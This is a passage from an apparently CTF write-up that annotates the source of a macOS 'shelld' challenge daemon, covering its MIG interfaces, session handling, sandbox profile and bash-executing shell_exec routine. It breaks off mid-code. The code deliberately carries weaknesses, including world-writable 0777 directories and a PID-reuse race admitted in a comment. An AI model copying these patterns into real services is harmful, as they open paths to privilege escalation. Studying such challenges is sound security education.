class="number">133700</span>;</span><br><span class="line"></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;mach/std_types.defs&gt;</span></span></span><br><span 
class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;mach/mach_types.defs&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;mach_debug/mach_debug_types.defs&gt;</span></span></span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> <span class="string">&quot;../common/types.h&quot;</span>;</span><br><span class="line"></span><br><span class="line">type string = c_string[*:<span class="number">4096</span>];</span><br><span class="line"></span><br><span class="line"><span class="function">routine <span class="title">shelld_create_session</span><span class="params">(server: <span class="type">mach_port_t</span>; name: string; ServerAuditToken token: <span class="type">audit_token_t</span>)</span></span>;</span><br><span class="line"><span class="function">routine <span class="title">shell_exec</span><span class="params">(server: <span class="type">mach_port_t</span>; session: string; command: string; ServerAuditToken token: <span class="type">audit_token_t</span>)</span></span>;</span><br><span class="line"><span class="function">routine <span class="title">register_completion_listener</span><span class="params">(server: <span class="type">mach_port_t</span>; session: string; listener: <span class="type">mach_port_t</span>; ServerAuditToken token: <span class="type">audit_token_t</span>)</span></span>;</span><br><span class="line"><span class="function">routine <span class="title">unregister_completion_listener</span><span class="params">(server: <span class="type">mach_port_t</span>; session: string; ServerAuditToken token: <span class="type">audit_token_t</span>)</span></span>;</span><br></pre></td></tr></table></figure><h4 id="b-shelld-client-defs">b. 
shelld_client.defs</h4><p>This file defines the interface <code>shelld_client_notify</code>, which the server presumably uses to notify the client.</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">subsystem shelld_client <span class="number">133800</span>;</span><br><span class="line"></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;mach/std_types.defs&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;mach/mach_types.defs&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;mach_debug/mach_debug_types.defs&gt;</span></span></span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> <span class="string">&quot;../common/types.h&quot;</span>;</span><br><span class="line"></span><br><span class="line">type string = c_string[*:<span class="number">4096</span>];</span><br><span class="line"></span><br><span class="line"><span class="function">routine <span class="title">shelld_client_notify</span><span class="params">(listener: <span class="type">mach_port_t</span>; status: <span class="type">int</span>; output: string)</span></span>;</span><br></pre></td></tr></table></figure><h4 id="c-shelld-c">c. 
shelld.c</h4><h5 id="1-shelld-main-函数">1) The shelld main function</h5><p>The main function does the following:</p><ol><li>Creates a <strong>global dictionary <code>sessions</code></strong>.</li><li>Creates the directory <code>/private/tmp/shelld</code> with mode 0777 (rwxrwxrwx).</li><li>Looks up the Mach port registered by capsd through bootstrap, and checks in its own Mach port with bootstrap.</li><li>Installs the MIG handler routine for its own Mach port.</li></ol><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">int</span> <span class="title">main</span><span class="params">(<span class="type">int</span> argc, <span class="type">const</span> <span class="type">char</span> *argv[])</span> </span>&#123;</span><br><span class="line">    <span class="type">kern_return_t</span> kr;</span><br><span class="line">    <span class="type">mach_port_t</span> bootstrap_port, service_port;</span><br><span class="line"></span><br><span class="line">    sessions = <span class="built_in">CFDictionaryCreateMutable</span>(kCFAllocatorDefault, <span class="number">0</span>, &amp;kCFTypeDictionaryKeyCallBacks, &amp;kCFTypeDictionaryValueCallBacks);</span><br><span class="line"></span><br><span 
class="line">    <span class="built_in">mkdir</span>(<span class="string">&quot;/private/tmp/shelld&quot;</span>, <span class="number">0777</span>);</span><br><span class="line"></span><br><span class="line">    <span class="built_in">task_get_special_port</span>(<span class="built_in">mach_task_self</span>(), TASK_BOOTSTRAP_PORT, &amp;bootstrap_port);</span><br><span class="line"></span><br><span class="line">    kr = <span class="built_in">bootstrap_look_up</span>(bootstrap_port, <span class="string">&quot;net.saelo.capsd&quot;</span>, &amp;capsd_service_port);</span><br><span class="line">    <span class="built_in">ASSERT_KERN_SUCCESS</span>(kr, <span class="string">&quot;bootstrap_look_up&quot;</span>);</span><br><span class="line"></span><br><span class="line">    kr = <span class="built_in">bootstrap_check_in</span>(bootstrap_port, <span class="string">&quot;net.saelo.shelld&quot;</span>, &amp;service_port);</span><br><span class="line">    <span class="built_in">ASSERT_KERN_SUCCESS</span>(kr, <span class="string">&quot;bootstrap_check_in&quot;</span>);</span><br><span class="line"></span><br><span class="line">    <span class="type">dispatch_source_t</span> source = <span class="built_in">dispatch_source_create</span>(DISPATCH_SOURCE_TYPE_MACH_RECV, service_port, <span class="number">0</span>, <span class="built_in">dispatch_get_main_queue</span>());</span><br><span class="line"></span><br><span class="line">    <span class="built_in">dispatch_source_set_event_handler</span>(source, ^&#123;</span><br><span class="line">        <span class="built_in">dispatch_mig_server</span>(source, MAX_MSG_SIZE, shelld_server);</span><br><span class="line">    &#125;);</span><br><span class="line"></span><br><span class="line">    <span class="built_in">dispatch_resume</span>(source);</span><br><span class="line">    <span class="built_in">dispatch_main</span>();</span><br><span class="line">    <span class="built_in">exit</span>(<span 
class="number">-1</span>);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><h5 id="2-register-completion-listener-函数">2) The register_completion_listener function</h5><p>This function is fairly simple: it first looks up, in the global sessions dictionary, the session dictionary that <strong>matches both session_name and client</strong>, then stores the Mach port of the passed-in listener in it.</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">kern_return_t</span> <span class="title">register_completion_listener</span><span class="params">(<span class="type">mach_port_t</span> server, <span class="type">const</span> <span class="type">char</span>* session_name, <span class="type">mach_port_t</span> listener, <span class="type">audit_token_t</span> client)</span> </span>&#123;</span><br><span class="line">    CFMutableDictionaryRef session = <span class="built_in">lookup_session</span>(session_name, client);</span><br><span class="line">    <span class="keyword">if</span> (!session) &#123;</span><br><span 
class="line">        <span class="built_in">mach_port_deallocate</span>(<span class="built_in">mach_task_self</span>(), listener);</span><br><span class="line">        <span class="keyword">return</span> KERN_FAILURE;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    CFNumberRef value = <span class="built_in">CFNumberCreate</span>(kCFAllocatorDefault, kCFNumberSInt32Type, &amp;listener);</span><br><span class="line">    <span class="built_in">CFDictionaryAddValue</span>(session, <span class="built_in">CFSTR</span>(<span class="string">&quot;listener&quot;</span>), value);</span><br><span class="line">    <span class="built_in">CFRelease</span>(value);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> KERN_SUCCESS;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function">CFMutableDictionaryRef <span class="title">lookup_session</span><span class="params">(<span class="type">const</span> <span class="type">char</span>* name, <span class="type">audit_token_t</span> client)</span> </span>&#123;</span><br><span class="line">    CFStringRef key = <span class="built_in">CFStringCreateWithCString</span>(kCFAllocatorDefault, name, kCFStringEncodingASCII);</span><br><span class="line"></span><br><span class="line">    CFMutableDictionaryRef session = <span class="literal">NULL</span>;</span><br><span class="line">    <span class="keyword">if</span> (<span class="built_in">CFDictionaryGetValueIfPresent</span>(sessions, key, (<span class="type">const</span> <span class="type">void</span>**)&amp;session)) &#123;</span><br><span class="line">        CFNumberRef cf_owner_pid = <span class="built_in">CFDictionaryGetValue</span>(session, <span class="built_in">CFSTR</span>(<span class="string">&quot;pid&quot;</span>));</span><br><span class="line">        <span class="type">int</span> owner_pid;</span><br><span 
class="line">        <span class="built_in">ASSERT</span>(<span class="built_in">CFNumberGetValue</span>(cf_owner_pid, kCFNumberSInt32Type, &amp;owner_pid));</span><br><span class="line">        <span class="keyword">if</span> (owner_pid != <span class="built_in">audit_token_to_pid</span>(client))</span><br><span class="line">            session = <span class="literal">NULL</span>;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="built_in">CFRelease</span>(key);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> session;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>At this point, the structure of the sessions dictionary can tentatively be described as:</p><figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="punctuation">&#123;</span></span><br><span class="line">    <span class="attr">&quot;session_name1&quot;</span> <span class="punctuation">:</span> <span class="punctuation">&#123;</span></span><br><span class="line">        <span class="attr">&quot;pid&quot;</span> <span class="punctuation">:</span> <span class="string">&quot;xxx&quot;</span><span class="punctuation">,</span></span><br><span class="line">        <span class="attr">&quot;listener&quot;</span> <span class="punctuation">:</span> <span class="string">&quot;&lt;mach_port_t&gt;&quot;</span></span><br><span class="line">    <span class="punctuation">&#125;</span><span class="punctuation">,</span></span><br><span class="line">    <span class="punctuation">[</span>...<span class="punctuation">]</span></span><br><span class="line"><span class="punctuation">&#125;</span></span><br></pre></td></tr></table></figure><h5 
id="3-unregister-completion-listener-函数">3) The unregister_completion_listener function</h5><p>It does the opposite of <code>register_completion_listener</code>: it removes the listener Mach port from the session.</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">kern_return_t</span> <span class="title">unregister_completion_listener</span><span class="params">(<span class="type">mach_port_t</span> server, <span class="type">const</span> <span class="type">char</span>* session_name, <span class="type">audit_token_t</span> client)</span> </span>&#123;</span><br><span class="line">    CFMutableDictionaryRef session = <span class="built_in">lookup_session</span>(session_name, client);</span><br><span class="line">    <span class="keyword">if</span> (!session)</span><br><span class="line">        <span class="keyword">return</span> KERN_FAILURE;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> <span class="built_in">remove_listener</span>(session);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">kern_return_t</span> <span class="title">remove_listener</span><span class="params">(CFMutableDictionaryRef 
session)</span> </span>&#123;</span><br><span class="line">    CFNumberRef value;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> (<span class="built_in">CFDictionaryGetValueIfPresent</span>(session, <span class="built_in">CFSTR</span>(<span class="string">&quot;listener&quot;</span>), (<span class="type">const</span> <span class="type">void</span>**)&amp;value)) &#123;</span><br><span class="line">        <span class="type">mach_port_t</span> listener;</span><br><span class="line">        <span class="built_in">ASSERT</span>(<span class="built_in">CFNumberGetValue</span>(value, kCFNumberSInt32Type, &amp;listener));</span><br><span class="line">        <span class="built_in">mach_port_deallocate</span>(<span class="built_in">mach_task_self</span>(), listener);</span><br><span class="line">        <span class="built_in">CFDictionaryRemoveValue</span>(session, <span class="built_in">CFSTR</span>(<span class="string">&quot;listener&quot;</span>));</span><br><span class="line">        <span class="keyword">return</span> KERN_SUCCESS;</span><br><span class="line">    &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">        <span class="keyword">return</span> KERN_FAILURE;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><h5 id="4-shelld-create-session-函数">4) The shelld_create_session function</h5><p>This function mainly creates an entry in the global sessions dictionary; the individual steps are annotated as comments in the code:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span 
class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">kern_return_t</span> <span class="title">shelld_create_session</span><span class="params">(<span class="type">mach_port_t</span> server, <span class="type">const</span> <span class="type">char</span>* session_name, <span class="type">audit_token_t</span> client)</span> </span>&#123;</span><br><span class="line">    <span class="comment">// Restrict the session name to letters and digits</span></span><br><span class="line">    <span class="keyword">for</span> (<span class="type">const</span> <span class="type">char</span>* ptr = session_name; *ptr; ptr++) &#123;</span><br><span class="line">        <span class="keyword">if</span> (!<span class="built_in">isalnum</span>(*ptr)) &#123;</span><br><span 
class="line">            <span class="built_in">os_log</span>(OS_LOG_DEFAULT, <span class="string">&quot;shelld: denying invalid session name: %s&quot;</span>, session_name);</span><br><span class="line">            <span class="keyword">return</span> KERN_FAILURE;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="comment">// A session with the same name cannot be created twice</span></span><br><span class="line">    CFStringRef key = <span class="built_in">CFStringCreateWithCString</span>(kCFAllocatorDefault, session_name, kCFStringEncodingASCII);</span><br><span class="line">    <span class="keyword">if</span> (<span class="built_in">CFDictionaryContainsKey</span>(sessions, key)) &#123;</span><br><span class="line">        <span class="built_in">os_log</span>(OS_LOG_DEFAULT, <span class="string">&quot;shelld: session already exists: %s&quot;</span>, session_name);</span><br><span class="line">        <span class="built_in">CFRelease</span>(key);</span><br><span class="line">        <span class="keyword">return</span> KERN_FAILURE;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="comment">// Create the session dictionary and add it to the global sessions dictionary</span></span><br><span class="line">    CFMutableDictionaryRef session = <span class="built_in">CFDictionaryCreateMutable</span>(kCFAllocatorDefault, <span class="number">0</span>, &amp;kCFTypeDictionaryKeyCallBacks, &amp;kCFTypeDictionaryValueCallBacks);</span><br><span class="line">    <span class="built_in">CFDictionaryAddValue</span>(sessions, key, session);</span><br><span class="line">    <span class="comment">// Store the pid corresponding to the audit token in the session dictionary</span></span><br><span class="line">    <span class="type">pid_t</span> pid = <span class="built_in">audit_token_to_pid</span>(client);</span><br><span class="line"></span><br><span class="line">    CFNumberRef cf_pid = <span class="built_in">CFNumberCreate</span>(kCFAllocatorDefault, kCFNumberSInt32Type, 
&amp;pid);</span><br><span class="line">    <span class="built_in">CFDictionaryAddValue</span>(session, <span class="built_in">CFSTR</span>(<span class="string">&quot;pid&quot;</span>), cf_pid);</span><br><span class="line">    <span class="built_in">CFRelease</span>(cf_pid);</span><br><span class="line">    <span class="comment">// Create a directory for the newly created session</span></span><br><span class="line">    <span class="type">char</span> workdir[<span class="number">1024</span>];</span><br><span class="line">    <span class="built_in">snprintf</span>(workdir, <span class="built_in">sizeof</span>(workdir), <span class="string">&quot;/private/tmp/shelld/%s&quot;</span>, session_name);</span><br><span class="line">    <span class="built_in">mkdir</span>(workdir, <span class="number">0777</span>);</span><br><span class="line"></span><br><span class="line">    <span class="comment">// Note: this is racy: the client could exit and spawn a priviliged process into its PID before the server</span></span><br><span class="line">    <span class="comment">// gets here... 
Not too easy to exploit though from inside the sandbox so should be fine for a CTF :)</span></span><br><span class="line">    <span class="comment">// Set up the cleanup to run when the process with the given pid exits</span></span><br><span class="line">    <span class="type">dispatch_source_t</span> source = <span class="built_in">dispatch_source_create</span>(DISPATCH_SOURCE_TYPE_PROC, pid, DISPATCH_PROC_EXIT, <span class="built_in">dispatch_get_main_queue</span>());</span><br><span class="line">    <span class="built_in">dispatch_source_set_event_handler</span>(source, ^&#123;</span><br><span class="line">        <span class="built_in">os_log</span>(OS_LOG_DEFAULT, <span class="string">&quot;shelld: cleaning up session for dead client %d&quot;</span>, pid);</span><br><span class="line"></span><br><span class="line">        <span class="built_in">remove_listener</span>(session);</span><br><span class="line">        <span class="built_in">CFDictionaryRemoveValue</span>(sessions, key);</span><br><span class="line"></span><br><span class="line">        <span class="comment">// TODO unlink directory here as well</span></span><br><span class="line"></span><br><span class="line">        <span class="built_in">CFRelease</span>(session);</span><br><span class="line">        <span class="built_in">CFRelease</span>(key);</span><br><span class="line"></span><br><span class="line">        <span class="built_in">dispatch_source_cancel</span>(source);</span><br><span class="line">        <span class="built_in">dispatch_release</span>(source);</span><br><span class="line">    &#125;);</span><br><span class="line">    <span class="built_in">dispatch_resume</span>(source);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> KERN_SUCCESS;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><h5 id="5-shell-exec-函数">5) The shell_exec function</h5><p>This next function is the centerpiece and deserves a careful walkthrough.</p><ol><li><p>First, shelld checks whether the passed-in command is empty. The command is later used by the child process created below, with an effect equivalent to 
<code>system(command)</code>, so it must not be empty.</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span> (!command || <span class="built_in">strlen</span>(command) == <span class="number">0</span>)</span><br><span class="line">        <span class="keyword">return</span> KERN_FAILURE;</span><br></pre></td></tr></table></figure></li><li><p>Next, it checks whether the message sender is allowed to execute <code>/bin/bash</code>, since the child process will invoke /bin/bash.</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// Check whether the passed-in creds are allowed to execute /bin/bash</span></span><br><span class="line"><span class="keyword">if</span> (<span class="built_in">sandbox_check_with_capabilities</span>(creds, <span class="string">&quot;process-exec*&quot;</span>, SANDBOX_CHECK_NO_REPORT, <span class="string">&quot;/bin/bash&quot;</span>)) &#123;</span><br><span class="line">    <span class="built_in">os_log</span>(OS_LOG_DEFAULT, <span class="string">&quot;shelld: denying request to sandboxed client %d\n&quot;</span>, <span class="built_in">audit_token_to_pid</span>(creds));</span><br><span class="line">    <span class="keyword">return</span> KERN_FAILURE;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>The <code>sandbox_check_with_capabilities</code> function works as follows:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span 
class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">int</span> <span class="title">sandbox_check_with_capabilities</span><span class="params">(<span class="type">audit_token_t</span> creds, <span class="type">const</span> <span class="type">char</span>* operation, <span class="type">int</span> flags, <span class="type">const</span> <span class="type">char</span>* arg)</span> </span>&#123;</span><br><span class="line">     <span class="comment">// If the sandbox check does not deny the operation for the sender (result != 1),</span></span><br><span class="line">     <span class="type">int</span> result = <span class="built_in">sandbox_check_by_audit_token</span>(creds, operation, flags, arg);</span><br><span class="line">     <span class="keyword">if</span> (result != <span class="number">1</span>) &#123;</span><br><span class="line">         <span class="comment">// return the result as-is; 0 means the operation is allowed</span></span><br><span class="line">         <span class="keyword">return</span> result;</span><br><span class="line">     &#125;</span><br><span class="line">     <span class="comment">// If the sender is not allowed to perform the operation, ask capsd whether the sender previously requested this capability</span></span><br><span class="line">     <span class="type">int</span> client_has_capability = <span class="number">0</span>;</span><br><span class="line">     <span class="type">pid_t</span> pid = <span class="built_in">audit_token_to_pid</span>(creds);</span><br><span class="line">     <span class="built_in">has_capability</span>(capsd_service_port, pid, operation, arg, &amp;client_has_capability);</span><br><span class="line">     <span class="comment">// If capsd holds the capability (client_has_capability is set), the function returns 0, meaning the operation is allowed</span></span><br><span class="line">     <span class="keyword">return</span> !client_has_capability;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p>After that, it looks up the session matching the passed-in session name and creds, 
and creates a pipe. The pipe will be used to redirect the child process's stdout.</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// Look up the session corresponding to the current creds</span></span><br><span class="line">CFMutableDictionaryRef session = <span class="built_in">lookup_session</span>(session_name, creds);</span><br><span class="line"><span class="keyword">if</span> (!session)</span><br><span class="line">    <span class="keyword">return</span> KERN_FAILURE;</span><br><span class="line"><span class="comment">// Create a read/write pipe pair, which will be used to redirect the child process's stdout</span></span><br><span class="line"><span class="type">int</span> fds[<span class="number">2</span>];</span><br><span class="line"><span class="built_in">ASSERT</span>(<span class="built_in">pipe</span>(fds) == <span class="number">0</span>);</span><br></pre></td></tr></table></figure></li><li><p>Next comes the creation of the child process. Let's see what the child does:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span 
class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// Create a new process</span></span><br><span class="line"><span class="type">int</span> pid = fork();</span><br><span class="line"><span class="keyword">if</span> (pid == <span class="number">0</span>) &#123;</span><br><span class="line">    <span class="comment">// In the child process</span></span><br><span class="line">    <span class="type">char</span>* argv[] = &#123;<span class="string">&quot;/bin/bash&quot;</span>, <span class="string">&quot;-c&quot;</span>, (<span class="type">char</span>*)command, <span class="literal">NULL</span>&#125;;</span><br><span class="line">    <span class="type">char</span>* envp[] = &#123;<span class="string">&quot;PATH=/bin:/usr/bin:/usr/sbin&quot;</span>, <span class="literal">NULL</span>&#125;;</span><br><span class="line">    <span class="comment">// Change the child's working directory to the session directory created earlier</span></span><br><span class="line">    <span class="type">char</span> cwd[<span class="number">1024</span>];</span><br><span class="line">    <span class="built_in">snprintf</span>(cwd, <span class="built_in">sizeof</span>(cwd), <span class="string">&quot;/private/tmp/shelld/%s&quot;</span>, session_name);</span><br><span class="line">    <span class="built_in">chdir</span>(cwd);</span><br><span class="line">    <span class="comment">// Voluntarily enter the sandbox</span></span><br><span class="line">    <span class="type">char</span> profile[<span class="number">4096</span>];</span><br><span class="line">    <span class="built_in">snprintf</span>(profile, <span class="built_in">sizeof</span>(profile), sb_profile_template, session_name);</span><br><span class="line">    <span class="built_in">sandbox_init</span>(profile, <span class="number">0</span>, <span class="literal">NULL</span>);</span><br><span class="line">    <span class="comment">// Redirect stdout</span></span><br><span class="line">    <span class="built_in">dup2</span>(fds[<span 
class="number">1</span>], STDOUT_FILENO);</span><br><span class="line">    <span class="built_in">close</span>(STDERR_FILENO);</span><br><span class="line">    <span class="built_in">close</span>(STDIN_FILENO);</span><br><span class="line"></span><br><span class="line">    <span class="built_in">close</span>(fds[<span class="number">0</span>]);</span><br><span class="line">    <span class="built_in">close</span>(fds[<span class="number">1</span>]);</span><br><span class="line">    <span class="comment">// Execute bash</span></span><br><span class="line">    <span class="built_in">execve</span>(<span class="string">&quot;/bin/bash&quot;</span>, argv, envp);</span><br><span class="line">    _exit(<span class="number">-1</span>);</span><br><span class="line">&#125; <span class="keyword">else</span> <span class="keyword">if</span> (pid &lt; <span class="number">0</span>) &#123;</span><br><span class="line">    <span class="keyword">return</span> KERN_FAILURE;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>As shown, the child first <strong>changes its current working directory</strong>, then <strong>voluntarily enters the sandbox</strong> and <strong>redirects stdout</strong>, and finally executes bash.</p><p>Calling <code>sandbox_init</code> to enter the sandbox requires a sandbox profile. Let's look at the profile template used for the child:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">const</span> <span class="type">char</span>* sb_profile_template =   <span class="string">&quot;(version 1)\n&quot;</span></span><br><span class="line">                                    <span class="string">&quot;(deny default)\n&quot;</span></span><br><span class="line">                                    <span class="string">&quot;(import 
\&quot;system.sb\&quot;)\n&quot;</span></span><br><span class="line">                                    <span class="string">&quot;(allow process-fork)\n&quot;</span></span><br><span class="line">                                    <span class="string">&quot;(allow file-read* file-write* (subpath \&quot;/private/tmp/shelld/%s\&quot;))\n&quot;</span></span><br><span class="line">                                    <span class="string">&quot;(allow file-read-data file-write-data (subpath \&quot;/dev/tty\&quot;))\n&quot;</span></span><br><span class="line">                                    <span class="string">&quot;(allow file-read* process-exec (subpath \&quot;/bin/\&quot;))\n&quot;</span></span><br><span class="line">                                    <span class="string">&quot;(allow file-read* process-exec (subpath \&quot;/usr/bin/\&quot;))\n&quot;</span></span><br><span class="line">                                    <span class="string">&quot;(allow file-read* process-exec (subpath \&quot;/usr/sbin/\&quot;))\n&quot;</span>;</span><br></pre></td></tr></table></figure><p>The profile configures the following permissions:</p><ul><li><p>Uses an allowlist: everything is denied by default.</p></li><li><p>Imports the system rules from <code>/System/Library/Sandbox/Profiles/system.sb</code>, which allow common operations such as reading /dev/null and /dev/zero.</p></li><li><p>Allows fork.</p></li><li><p>Allows <strong>reading and writing</strong> <strong>any information</strong> of <strong>every file</strong> under the session's working directory.</p><blockquote><p>Here, <strong>any information</strong> includes, but is not limited to, file data, file <strong>meta</strong>data, and extended file attributes.</p><p>In other words, everything about a file that can be read.</p></blockquote></li><li><p>Allows reading and writing the <strong>data</strong> of any file under the /dev/tty path.</p></li><li><p>Allows <strong>reading and executing</strong> <strong>any file</strong> under /bin, /usr/bin, and /usr/sbin.</p></li></ul></li><li><p>Back in the parent process, the parent next registers <strong>an event handler for the child process's exit</strong>.</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span 
class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">int</span> rfd = fds[<span class="number">0</span>];</span><br><span class="line"></span><br><span class="line">__block <span class="type">int</span> running = <span class="literal">true</span>;</span><br><span class="line"></span><br><span class="line"><span class="comment">// register a cleanup handler for process exit</span></span><br><span class="line"><span class="built_in">os_log</span>(OS_LOG_DEFAULT, <span class="string">&quot;shelld: bash spawned: %d\n&quot;</span>, pid);</span><br><span class="line"><span class="type">dispatch_source_t</span> source = <span class="built_in">dispatch_source_create</span>(DISPATCH_SOURCE_TYPE_PROC, pid, DISPATCH_PROC_EXIT, <span class="built_in">dispatch_get_main_queue</span>());</span><br><span class="line"><span class="built_in">dispatch_source_set_event_handler</span>(source, ^&#123;</span><br><span class="line">    running = <span class="literal">false</span>;</span><br><span class="line">    <span class="built_in">handle_process_exited</span>(pid, session, rfd);</span><br><span class="line">    <span 